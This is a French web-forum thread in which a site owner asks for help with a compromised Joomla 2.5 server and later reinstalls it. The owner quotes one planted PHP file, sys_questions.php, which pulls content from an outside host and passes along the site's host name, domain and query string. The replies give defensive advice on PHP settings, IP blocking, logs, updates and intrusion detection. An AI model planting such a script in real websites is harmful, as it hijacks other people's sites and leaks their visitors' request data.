Signaler

Intrusion site WEB [Résolu]

Posez votre question xCessDsvL 7Messages postés lundi 5 septembre 2016Date d'inscription 26 septembre 2016 Dernière intervention - Dernière réponse le 16 sept. 2016 à 09:33
Bonjour,
Nous avons actuellement (et apparemment depuis un bon moment) des intrusions sur notre site WEB.
C'est un joomla 2.5 installé sous Debian 6 (je sais c'est vieux, mais je n'ai pas les connaissances pour faire les MAJ et pas la possibilité de repartir sur du neuf).
Récemment le fichier index.php avait été modifié pour renvoyer vers une IP à Hong Kong.
Des fichiers de ce type sont créés régulièrement (même après suppression) :
sys_questions.php
<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "http://zhou.5325669.com/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

?>

J'ai fait un scan clamav mais il n'a apparemment pas trouvé la cause de cette situation.
Merci d'avance pour votre aide.
Edit : Après changement de droits (retrait droit d'execution pour Others), les fichiers ont disparu. Ils sont réapparus après la remise des droits.
J'imagine qu'il s'agit donc d'un script qui s'execute lorsque le serveur est connecté à internet.
Afficher la suite 
Utile
+1
moins plus
OS plus maintenu depuis février 2016,version de joomla plus à jour ...

En guise de pansement tu peux bloquer les adresses ip chinoises si ça ne nuie pas à ton site, tu peux bloquer l'usage de file_get_content sur les urls ( http://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen ).

Après, sans savoir à quel point ils ont pénétré dans le système (web uniquement, serveur (partiellement), serveur (root) ) certaines mesures ne feront pas long feu.
Ajouter un commentaire
Utile
+0
moins plus
Merci pour votre réponse.
J'étais justement en train de réfléchir au blocage d'IPs.

Auriez-vous une façon de déterminer les IPs qui tapent sur le site ?
J'ai actuellement bloqué une IP ukrainienne à l'aide de "netstat -tn" et en la rajoutant dans IPTABLES mais les fichiers php continuent de se générer.
Rocailleux 391Messages postés mercredi 9 mars 2016Date d'inscription 29 septembre 2016 Dernière intervention - 5 sept. 2016 à 16:43
L'idée c'est de trouver les plages d'adresse allouées en chine, certain sites les répertorient :

http://www.nirsoft.net/countryip/cn.html
http://www.parkansky.com/china.htm

Sinon les logs apache par défaut enregistrent l'adresse ip des requetes (GET)

Il est possible que les fichiers se générent sans accès à internet (en ajoutant une tache cron par exemple), un audit du code est necessaire (ou mise à jour)
Répondre
xCessDsvL 7Messages postés lundi 5 septembre 2016Date d'inscription 26 septembre 2016 Dernière intervention - 7 sept. 2016 à 10:02
Merci pour votre réponse.

Je n'ai malheureusement pas la possibilité de bloquer les IPs chinoises (vis à vis de nos clients).
Un collègue travaillant aussi dans le réseau m'a dit qu'il s'agirait à priori d'un script qui s'exécute sur le serveur.

Auriez-vous une idée de comment repérer un potentiel script ?
Répondre
Ajouter un commentaire
Utile
+0
moins plus
Etant donné le taux d'infection du site (j'ai arrêté de compter le nombre de scripts trouvés après le 20e), j'ai finalement décidé de réinstaller un serveur WEB sous Debian 8 tout en gardant les fichiers et la base Mysql de l'ancien site (que j'ai passé sous 20 antimalwares différents).

Le site est normalement propre et fonctionnel hormis un petit problème de réécriture d'url au vol.

Auriez-vous des conseils à me donner pour éviter les infections de ce genre à l'avenir ?

Merci.
Rocailleux 391Messages postés mercredi 9 mars 2016Date d'inscription 29 septembre 2016 Dernière intervention - 15 sept. 2016 à 20:23
Mettre à jour, faire des audits de temps en temps, tu peux installer un IDS (systeme de detection d'intrusion), vérifier les logs de temps en temps (certains outils aident à visualiser les logs)
Répondre
xCessDsvL 7Messages postés lundi 5 septembre 2016Date d'inscription 26 septembre 2016 Dernière intervention - 16 sept. 2016 à 09:33
D'accord merci pour toutes ces informations !

Je passe donc le sujet en résolu.
Répondre
Ajouter un commentaire

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !